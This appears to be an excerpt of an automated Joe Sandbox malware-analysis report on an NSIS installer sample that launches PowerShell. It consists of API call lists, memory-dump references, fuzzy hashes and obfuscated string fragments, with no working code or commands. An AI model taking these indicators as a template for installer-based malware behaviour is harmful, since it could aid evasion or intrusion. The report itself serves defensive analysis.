                                                  • RegEnumValueW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000,?,?,00100020,?,?,?), ref: 00402E95
                                                  • RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 00402EE1
                                                  • RegCloseKey.ADVAPI32(?,?,?), ref: 00402EEA
                                                  • RegDeleteKeyW.ADVAPI32(?,?), ref: 00402F01
                                                  • RegCloseKey.ADVAPI32(?,?,?), ref: 00402F0C
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1676796300.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.1676770960.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1676818375.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1676832252.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1676832252.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1676832252.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1676832252.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1676832252.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1676832252.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1676832252.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1676832252.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1677056612.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1677056612.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1677056612.0000000000494000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1677056612.00000000004A6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_24100311.jbxd
                                                  Similarity
                                                  • API ID: CloseEnum$DeleteValue
                                                  • String ID:
                                                  • API String ID: 1354259210-0
                                                  • Opcode ID: f62ab79c521e370d5556569303502529bbab9984cd7072d733bebeae98d4866a
                                                  • Instruction ID: 5acf5ff44325b65ef2d3dead3dbb76990f04c91a4d0d8f72c78c18ffef5b4167
                                                  • Opcode Fuzzy Hash: f62ab79c521e370d5556569303502529bbab9984cd7072d733bebeae98d4866a
                                                  • Instruction Fuzzy Hash: 05215A71500109BBDF129F90CE89EEF7A7DEB54348F110076B905B11E0E7B48E54AAA8
                                                  APIs
                                                  • GetDlgItem.USER32(?,?), ref: 00401D9A
                                                  • GetClientRect.USER32(?,?), ref: 00401DE5
                                                  • LoadImageW.USER32(?,?,?,?,?,?), ref: 00401E15
                                                  • SendMessageW.USER32(?,00000172,?,00000000), ref: 00401E29
                                                  • DeleteObject.GDI32(00000000), ref: 00401E39
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1676796300.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.1676770960.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1676818375.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1676832252.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1676832252.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1676832252.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1676832252.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1676832252.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1676832252.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1676832252.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1676832252.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1677056612.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1677056612.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1677056612.0000000000494000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1677056612.00000000004A6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_24100311.jbxd
                                                  Similarity
                                                  • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                                  • String ID:
                                                  • API String ID: 1849352358-0
                                                  • Opcode ID: 657c18a0f69634810084f7808af5fab3a58a396e011c15f602512883127771f4
                                                  • Instruction ID: def1b01f8fd4f78887aa18ea50614605241407c0d84dd339e733dcfbebc98a92
                                                  • Opcode Fuzzy Hash: 657c18a0f69634810084f7808af5fab3a58a396e011c15f602512883127771f4
                                                  • Instruction Fuzzy Hash: 06212672A04119AFCB05CFA4DE45AEEBBB5EF08304F14403AF945F62A0C7389D51DB98
                                                  APIs
                                                  • lstrlenW.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,004035C5,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403822,?,00000007,00000009,0000000B), ref: 00405E17
                                                  • CharPrevW.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,004035C5,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403822,?,00000007,00000009,0000000B), ref: 00405E21
                                                  • lstrcatW.KERNEL32(?,0040A014,?,00000007,00000009,0000000B), ref: 00405E33
                                                  Strings
                                                  • C:\Users\user\AppData\Local\Temp\, xrefs: 00405E11
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1676796300.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.1676770960.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1676818375.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1676832252.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1676832252.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1676832252.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1676832252.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1676832252.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1676832252.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1676832252.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1676832252.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1677056612.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1677056612.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1677056612.0000000000494000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1677056612.00000000004A6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_24100311.jbxd
                                                  Similarity
                                                  • API ID: CharPrevlstrcatlstrlen
                                                  • String ID: C:\Users\user\AppData\Local\Temp\
                                                  • API String ID: 2659869361-3081826266
                                                  • Opcode ID: bed06d4f6a82b163f62297ef23baf12e7c7e8c5859eb2f34a161a285e0ec4316
                                                  • Instruction ID: be8ecf20d8ded769d30575e1df7d92fadfde1fb70814d4249ac81525444b4036
                                                  • Opcode Fuzzy Hash: bed06d4f6a82b163f62297ef23baf12e7c7e8c5859eb2f34a161a285e0ec4316
                                                  • Instruction Fuzzy Hash: 4DD0A7311029347AC2117B489C08CDF62ACAE96300341043BF142B30A4C77C5E5287FD
                                                  APIs
                                                  • lstrlenA.KERNEL32(open "powershell.exe"), ref: 0040268D
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1676796300.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.1676770960.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1676818375.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1676832252.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1676832252.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1676832252.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1676832252.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1676832252.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1676832252.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1676832252.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1676832252.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1677056612.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1677056612.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1677056612.0000000000494000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1677056612.00000000004A6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_24100311.jbxd
                                                  Similarity
                                                  • API ID: lstrlen
                                                  • String ID: Forkynders\baskets\acylate$open "powershell.exe"
                                                  • API String ID: 1659193697-3788940404
                                                  • Opcode ID: c0e9709f4414c123a9561e1ba197458eec5955b960e9bcf0ffe45126c9858767
                                                  • Instruction ID: 5d79e66603f7cd29b77c79f3cf3d62822218e64012773efd3f53c153c7218f52
                                                  • Opcode Fuzzy Hash: c0e9709f4414c123a9561e1ba197458eec5955b960e9bcf0ffe45126c9858767
                                                  • Instruction Fuzzy Hash: EC112772A40204ABCB00AFB18E4EA9E73719F54708F21443FE402B61C1EAFD8991561F
                                                  APIs
                                                    • Part of subcall function 0040653C: lstrcpynW.KERNEL32(?,?,00000400,004036A9,00429260,NSIS Error,?,00000007,00000009,0000000B), ref: 00406549
                                                    • Part of subcall function 00405EBC: CharNextW.USER32(?,?,00425F50,?,00405F30,00425F50,00425F50,74DF3420,?,74DF2EE0,00405C6E,?,74DF3420,74DF2EE0,00000000), ref: 00405ECA
                                                    • Part of subcall function 00405EBC: CharNextW.USER32(00000000), ref: 00405ECF
                                                    • Part of subcall function 00405EBC: CharNextW.USER32(00000000), ref: 00405EE7
                                                  • lstrlenW.KERNEL32(00425F50,00000000,00425F50,00425F50,74DF3420,?,74DF2EE0,00405C6E,?,74DF3420,74DF2EE0,00000000), ref: 00405F72
                                                  • GetFileAttributesW.KERNEL32(00425F50,00425F50,00425F50,00425F50,00425F50,00425F50,00000000,00425F50,00425F50,74DF3420,?,74DF2EE0,00405C6E,?,74DF3420,74DF2EE0), ref: 00405F82
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1676796300.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.1676770960.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1676818375.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1676832252.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1676832252.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1676832252.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1676832252.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1676832252.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1676832252.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1676832252.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1676832252.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1677056612.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1677056612.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1677056612.0000000000494000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1677056612.00000000004A6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_24100311.jbxd
                                                  Similarity
                                                  • API ID: CharNext$AttributesFilelstrcpynlstrlen
                                                  • String ID: P_B
                                                  • API String ID: 3248276644-906794629
                                                  • Opcode ID: 599bd04a1195b132cf6b260ce9cfa8fb39e22d36c0f4a850b99e9cc2c8b8c615
                                                  • Instruction ID: 859fcd89679448da631e779a0da4808ed27405fda231041bc00783fb73730a7b
                                                  • Opcode Fuzzy Hash: 599bd04a1195b132cf6b260ce9cfa8fb39e22d36c0f4a850b99e9cc2c8b8c615
                                                  • Instruction Fuzzy Hash: 5DF0F925115D2325D722333A5D09AAF1544CF92358B49013FF895F22C1DA3C8A13CDBE
                                                  APIs
                                                  • IsWindowVisible.USER32(?), ref: 00405547
                                                  • CallWindowProcW.USER32(?,?,?,?), ref: 00405598
                                                    • Part of subcall function 004044DE: SendMessageW.USER32(?,00000000,00000000,00000000), ref: 004044F0
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1676796300.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.1676770960.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1676818375.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1676832252.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1676832252.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1676832252.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1676832252.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1676832252.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1676832252.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1676832252.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1676832252.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1677056612.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1677056612.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1677056612.0000000000494000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1677056612.00000000004A6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_24100311.jbxd
                                                  Similarity
                                                  • API ID: Window$CallMessageProcSendVisible
                                                  • String ID:
                                                  • API String ID: 3748168415-3916222277
                                                  • Opcode ID: e2a7228699b6e9b249c6dba5f8e9bb0c65ec33a27f8289b454cb53322165a19e
                                                  • Instruction ID: 7ed895885fecbfe1028844bafe119d46ede1b6e58bfeef0b35ccd3d75cf6e938
                                                  • Opcode Fuzzy Hash: e2a7228699b6e9b249c6dba5f8e9bb0c65ec33a27f8289b454cb53322165a19e
                                                  • Instruction Fuzzy Hash: E60171B1200648BFDF208F11DD80A6B7726EB84755F244537FA007A1D4C77A8E529E59
                                                  APIs
                                                  • lstrlenW.KERNEL32(80000000,C:\Users\user\Desktop,004030D4,C:\Users\user\Desktop,C:\Users\user\Desktop,00438800,00438800,80000000,00000003), ref: 00405E63
                                                  • CharPrevW.USER32(80000000,00000000,80000000,C:\Users\user\Desktop,004030D4,C:\Users\user\Desktop,C:\Users\user\Desktop,00438800,00438800,80000000,00000003), ref: 00405E73
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1676796300.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.1676770960.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1676818375.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1676832252.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1676832252.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1676832252.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1676832252.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1676832252.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1676832252.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1676832252.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1676832252.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1677056612.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1677056612.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1677056612.0000000000494000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1677056612.00000000004A6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_24100311.jbxd
                                                  Similarity
                                                  • API ID: CharPrevlstrlen
                                                  • String ID: C:\Users\user\Desktop
                                                  • API String ID: 2709904686-224404859
                                                  • Opcode ID: ca28fb495e832aca3bc5bc38fa8d5a1d536c38e2997e226eadf599fe90d3b243
                                                  • Instruction ID: 42216084ebed45f2f1fcdcce66f7b00f69915d90115442600aae12f46dcfca4c
                                                  • Opcode Fuzzy Hash: ca28fb495e832aca3bc5bc38fa8d5a1d536c38e2997e226eadf599fe90d3b243
                                                  • Instruction Fuzzy Hash: 65D05EB2401D209AC3226718DD04DAF73ACEF5134074A482AE582A61A4D7785E8186E8
                                                  APIs
                                                  • lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,0040627C,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405FA7
                                                  • lstrcmpiA.KERNEL32(00000000,00000000), ref: 00405FBF
                                                  • CharNextA.USER32(00000000,?,00000000,0040627C,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405FD0
                                                  • lstrlenA.KERNEL32(00000000,?,00000000,0040627C,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405FD9
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1676796300.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.1676770960.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1676818375.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1676832252.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1676832252.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1676832252.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1676832252.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1676832252.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1676832252.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1676832252.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1676832252.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1677056612.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1677056612.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1677056612.0000000000494000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1677056612.00000000004A6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_24100311.jbxd
                                                  Similarity
                                                  • API ID: lstrlen$CharNextlstrcmpi
                                                  • String ID:
                                                  • API String ID: 190613189-0
                                                  • Opcode ID: 4f145c51a58837bd7eda372618efc6ab74ada67201017ca859b4805a40dfc06b
                                                  • Instruction ID: a453383ccec69260e8b6b46741f5159dab33bedf04c15e844a7af63cc501478c
                                                  • Opcode Fuzzy Hash: 4f145c51a58837bd7eda372618efc6ab74ada67201017ca859b4805a40dfc06b
                                                  • Instruction Fuzzy Hash: 02F06235105418EFD7029BA5DD40D9EBBA8DF06350B2540BAE840F7350D678DE01ABA9
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.2045005638.00000000072C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072C0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_72c0000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: (fDl$(fDl$(fDl$(fDl$(fDl$(fDl$(fDl$(fDl$(fDl$(fDl$(fDl$(fDl$(fDl$(fDl$(fDl$(fDl$(fDl$(fDl$(fDl$(fDl$(fDl$(fDl$(fDl$(fDl$(fDl$(fDl$(fDl$(fDl$(fDl$(fDl$(fDl$(fDl$4'tq$4'tq$4'tq$4'tq$4'tq$4Al$4Al$tL6k$tL6k$tL6k$tL6k$tL6k$tL6k$x.5k$x.5k$x.5k$-5k$-5k
                                                  • API String ID: 0-1515602180
                                                  • Opcode ID: 74150c2635995e16af2e634458a91098fa5f03be9a2cc7cfb56bfb14636071f3
                                                  • Instruction ID: 67356e99119e9dc052c78a053d266d205743cc5e472c6a5ebb126cb2e322ff20
                                                  • Opcode Fuzzy Hash: 74150c2635995e16af2e634458a91098fa5f03be9a2cc7cfb56bfb14636071f3
                                                  • Instruction Fuzzy Hash: 82036FB4E10215DFEB20DB68C951FAABBB2EF85304F2185A9D8096B744CB35ED81CF51
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.2039795604.0000000000B0D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B0D000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_b0d000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: ce395e2e78d051e131abeb5105f69357df8597fc21fb2925dade635c4fbb3ae9
                                                  • Instruction ID: 07a1dd2cc0e9bb2736563f15c2f3ab3f9d72f4a276e880c07b351eee5a6d6af8
                                                  • Opcode Fuzzy Hash: ce395e2e78d051e131abeb5105f69357df8597fc21fb2925dade635c4fbb3ae9
                                                  • Instruction Fuzzy Hash: B621E0B1604201DFDF25CF54D9C0B26BFA5FB88324F24C5B9E9094A696C336D816CB61
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.2045005638.00000000072C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072C0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_72c0000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: (fDl$(fDl$(fDl$(fDl$(fDl$(fDl$(fDl$(fDl$(fDl$(fDl$(fDl$(fDl$(fDl$(fDl$(fDl$(fDl$(fDl$(fDl$(fDl$(fDl$(fDl$(fDl$(fDl$4'tq$4'tq$4'tq$tL6k$tL6k$tL6k$tL6k$x.5k$x.5k$-5k$-5k
                                                  • API String ID: 0-1583460851
                                                  • Opcode ID: 291d302652daac63d6b7355f5116b04b6fcf0b999b5abc72c1bedb518f2b9e2b
                                                  • Instruction ID: ef7c700b8893320e7b232b3e13c74040506e101ff186738bcd646d3c916d7a66
                                                  • Opcode Fuzzy Hash: 291d302652daac63d6b7355f5116b04b6fcf0b999b5abc72c1bedb518f2b9e2b
                                                  • Instruction Fuzzy Hash: 79C262B4B102159FE724DB64C950FAABBB2EF89304F20C5A9D80A6B745CB35ED81CF51
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.2045005638.00000000072C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072C0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_72c0000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: (fDl$(fDl$4'tq$4'tq$4'tq$4'tq$4'tq$4'tq$4'tq$4'tq$4'tq$4'tq$4'tq$4'tq$4'tq$4'tq$4'tq$4'tq$4'tq$4'tq$4'tq$4'tq$4'tq$4'tq$4'tq$4'tq$tPtq$tPtq$:l$:l
                                                  • API String ID: 0-2165853414
                                                  • Opcode ID: 1f3346f6b429a87fe625ac474131a07dd9b74088994fcb38d0d4bb9112424363
                                                  • Instruction ID: 53a013100bbdd8c7ce0c771284751c73def57766ad001372b30e615551a35645
                                                  • Opcode Fuzzy Hash: 1f3346f6b429a87fe625ac474131a07dd9b74088994fcb38d0d4bb9112424363
                                                  • Instruction Fuzzy Hash: 4DC28FB4B20245CFD724DBA8C451FAABBB2AB94304F20C25DD915AF356CB76DC41CB92
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.2045005638.00000000072C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072C0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_72c0000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: (fDl$(fDl$(fDl$(fDl$(fDl$(fDl$(fDl$(fDl$(fDl$(fDl$(fDl$(fDl$(fDl$(fDl$(fDl$(fDl$(fDl$(fDl$(fDl$(fDl$(fDl$4'tq$4'tq$tL6k$x.5k$-5k
                                                  • API String ID: 0-2768724520
                                                  • Opcode ID: d264f82eac84ab9ef567b8c8788b508b6b3f646f32e2ae8151bec1d28dc28133
                                                  • Instruction ID: 14cc8cbeffca4d20b253a951814aaed7f22cd16da697ac132d58613a2510b55f
                                                  • Opcode Fuzzy Hash: d264f82eac84ab9ef567b8c8788b508b6b3f646f32e2ae8151bec1d28dc28133
                                                  • Instruction Fuzzy Hash: 78827FB4A10255CFE724DB68C851FAABBB2EB85304F20C6ADD50A6B744CB35ED81CF51
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.2045005638.00000000072C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072C0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_72c0000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: (fDl$(fDl$(fDl$(fDl$(fDl$(fDl$(fDl$(fDl$(fDl$(fDl$(fDl$(fDl$(fDl$(fDl$(fDl$(fDl$(fDl$(fDl$(fDl$(fDl$(fDl$4'tq$tL6k$tL6k$x.5k$-5k
                                                  • API String ID: 0-1225406450
                                                  • Opcode ID: 738d54263394aeaebf4ca8df0de9e3a97bd6604af86b04def660a6adce7b4631
                                                  • Instruction ID: ad2c9b11d89027771ee83f74ec964444cbade5a3d98cf5d6341c12bde89dd717
                                                  • Opcode Fuzzy Hash: 738d54263394aeaebf4ca8df0de9e3a97bd6604af86b04def660a6adce7b4631
